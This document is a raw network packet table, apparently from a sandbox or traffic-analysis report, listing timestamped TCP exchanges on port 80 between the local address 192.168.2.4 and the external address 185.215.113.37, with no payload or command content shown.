Oct 24, 2024 19:29:16.492223024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492229939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492249966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492253065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492269993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492270947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492286921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492286921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492304087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492316961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492321014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492325068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492346048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492363930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492389917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492405891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492422104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492434978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492438078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492454052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492460012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492469072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492486000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492503881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492541075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492556095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492571115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492584944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492588043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492594004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492604971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492614985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492629051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492645025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492757082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492770910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492785931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492799997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492801905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492819071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492835999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492854118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492857933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492873907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492899895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492902040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492913961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492923021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492939949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492947102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492958069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492968082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492974043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.492985964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.492989063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493000984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493027925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493057966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493061066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493088007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493102074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493103981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493120909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493128061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493139029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493146896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493155956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493165016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493172884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493179083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493196964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493213892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493248940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493263960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493292093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493304014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493305922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493319988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493335962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493351936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493355036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493362904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493369102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493379116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493398905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493417978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493444920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493459940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493474960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493484974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493490934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493501902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493515015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493531942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493597031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493612051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493626118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493638992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493642092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493659019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493664980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493664980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493674994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493684053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493694067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493701935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493721008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493735075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493885040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493901014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493921995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493930101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493937016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493948936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493953943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493957043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493969917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493978977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.493987083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.493997097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494025946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494029999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494029999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494043112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494060993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494067907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494079113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494086981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494095087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494106054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494118929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494133949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494138002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494175911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494265079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494280100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494297028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494306087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494314909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494319916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494333029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494338989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494349003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494358063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494366884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494376898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494391918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494406939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494469881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494484901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494499922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494514942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494517088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494529963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494537115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494544983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494564056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494584084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494622946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494637966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494651079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494666100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494668007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494683027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494685888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494702101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494709969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494724989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494731903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494740963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494752884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494755983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494771004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494771957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494781971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494787931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494801044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494801044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494813919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494816065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494834900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494838953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494854927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494856119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494874001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.494878054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494901896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.494920015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.495016098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.495059967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.495099068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.495114088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.495127916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.495141983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.495141983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.495155096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.495163918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.495173931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.495186090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.495208979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609349012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609368086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609395981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609410048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609426022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609441042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609472036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609514952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609546900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609575033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609590054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609594107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609606981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609620094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609626055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609648943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609653950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609658003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609662056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609673977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609688997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609705925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609705925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609721899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609730005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609730005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609751940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609767914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609777927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609793901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609807014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609824896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609834909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609842062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609859943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609879017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609883070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609889984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609895945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609920979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609927893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.609971046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.609987020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610012054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610030890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610059023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610074043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610088110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610096931 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610101938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610117912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610121012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610135078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610153913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610168934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610172033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610184908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610200882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610210896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610222101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610235929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610263109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610277891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610292912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610302925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610321045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610330105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610337973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610356092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610375881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610378981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610392094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610400915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610419989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610436916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610461950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610475063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610487938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610500097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610503912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610518932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610519886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610526085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610557079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610574961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610589981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610599041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610605001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610618114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610630035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610649109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610660076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610675097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610687971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610699892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610711098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610733986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610791922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610806942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610821009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610831976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610836029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610853910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610862017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610862017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610871077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610877991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610887051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610894918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610907078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610927105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610938072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610955000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.610980988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.610995054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611114979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611129999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611145020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611152887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611160040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611166000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611176014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611185074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611190081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611191988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611208916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611216068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611222982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611243963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611243963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611277103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:16.611283064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:16.611293077 CEST	80	49730	185.215.113.37	192.168.2.4
